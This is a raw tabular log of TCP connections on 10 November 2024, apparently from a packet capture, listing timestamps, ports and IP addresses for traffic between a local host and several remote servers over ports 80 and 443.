Nov 10, 2024 04:55:23.443352938 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:23.444399118 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:23.444408894 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:23.446674109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.448919058 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:23.448935986 CET	443	49831	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:23.449083090 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:23.451879978 CET	49831	443	192.168.2.5	108.156.245.115
Nov 10, 2024 04:55:23.451891899 CET	443	49831	108.156.245.115	192.168.2.5
Nov 10, 2024 04:55:23.453686953 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:23.453696012 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:23.454008102 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:23.454008102 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:23.454022884 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:23.471667051 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.471692085 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.471767902 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.471777916 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.472496033 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.472523928 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.472526073 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.472536087 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.472626925 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.472626925 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.478329897 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.478343964 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.478424072 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.478427887 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.478487015 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.478930950 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.478945017 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.479091883 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.479096889 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.479229927 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.479906082 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.479922056 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.480267048 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.480271101 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.480333090 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.480361938 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.480365038 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.480391026 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.480396032 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.480438948 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.480438948 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.480618954 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.485096931 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.485104084 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.498934031 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.498965025 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.499092102 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.499092102 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.499109030 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.544856071 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.551348925 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.551367998 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.551526070 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.551533937 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.551600933 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.551620007 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.551625013 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.551631927 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.551645041 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.551759958 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.551778078 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.551784039 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.551805019 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.552064896 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.552088976 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.552094936 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.552114964 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.552131891 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.552150011 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.552160025 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.552174091 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.552182913 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.552231073 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.552231073 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.552273989 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.552345037 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.552351952 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.552407980 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.552551985 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.579041004 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.583884001 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.583890915 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.640428066 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.640440941 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.640548944 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.645210981 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.645220041 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.722048998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722075939 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722191095 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722191095 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722193956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722275019 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722275972 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722387075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722454071 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722470999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722501993 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722516060 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722563982 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722563982 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722645044 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722655058 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722692966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722722054 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722836018 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722853899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722868919 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722883940 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722906113 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722935915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722964048 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.722968102 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722980976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.722989082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723001003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723015070 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723021030 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723021030 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723026037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723057985 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723068953 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723078966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723081112 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723087072 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723108053 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723121881 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723121881 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723121881 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723157883 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723159075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723177910 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723191023 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723198891 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723200083 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723203897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723227024 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723227024 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723238945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723251104 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723263025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723263979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723277092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723287106 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723287106 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723289013 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723323107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723323107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723356009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723365068 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723385096 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723385096 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723386049 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723395109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723407984 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723431110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723431110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723486900 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723499060 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723500967 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723510027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723520994 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723531008 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723547935 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723556995 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723572016 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723589897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723589897 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723622084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723634958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723634958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723634958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723634958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723654985 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723673105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723673105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723675966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723687887 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723700047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723705053 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723712921 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723721027 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723728895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723737955 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723753929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723772049 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723788977 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723793983 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723793983 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723799944 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723813057 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723825932 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723826885 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723833084 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723833084 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723839045 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723850965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723864079 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723864079 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723864079 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723875999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723893881 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723895073 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723902941 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723917961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723917961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723917961 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723953009 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723953009 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.723958015 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723974943 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723984003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.723994017 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724008083 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724014997 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724020004 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724045992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724057913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724067926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724067926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724072933 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724102974 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724114895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724117041 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724127054 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724128962 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724139929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724144936 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724159002 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724160910 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724179983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724186897 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724196911 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724224091 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724230051 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724230051 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724236012 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724253893 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724253893 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724263906 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724275112 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724289894 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724296093 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724297047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724311113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724323034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724323988 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724335909 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724345922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724355936 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724355936 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724375963 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724387884 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724404097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724405050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724405050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724416971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724430084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724457026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724457026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724457026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724457979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724469900 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724483967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724503040 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724505901 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724505901 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724505901 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724522114 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724529982 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724535942 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724548101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724554062 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724560022 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724570036 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724582911 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724582911 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724598885 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724610090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724612951 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724612951 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724622965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724627018 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724636078 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.724689960 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.724689960 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839220047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839238882 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839263916 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839287043 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839298010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839308023 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839338064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839353085 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839380026 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839385986 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839390039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839413881 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839422941 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839436054 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839447975 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839457989 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839461088 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839469910 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839473963 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839500904 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839523077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839548111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839548111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839548111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839553118 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839564085 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839576006 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839590073 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839590073 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839598894 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839601994 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839612961 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839627981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839647055 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839647055 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839649916 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839662075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839673042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839687109 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839687109 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839693069 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839709997 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839718103 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839729071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839741945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839751005 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839755058 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839766979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.839782953 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.839797974 CET	80	49771	185.215.113.206	192.168.2.5
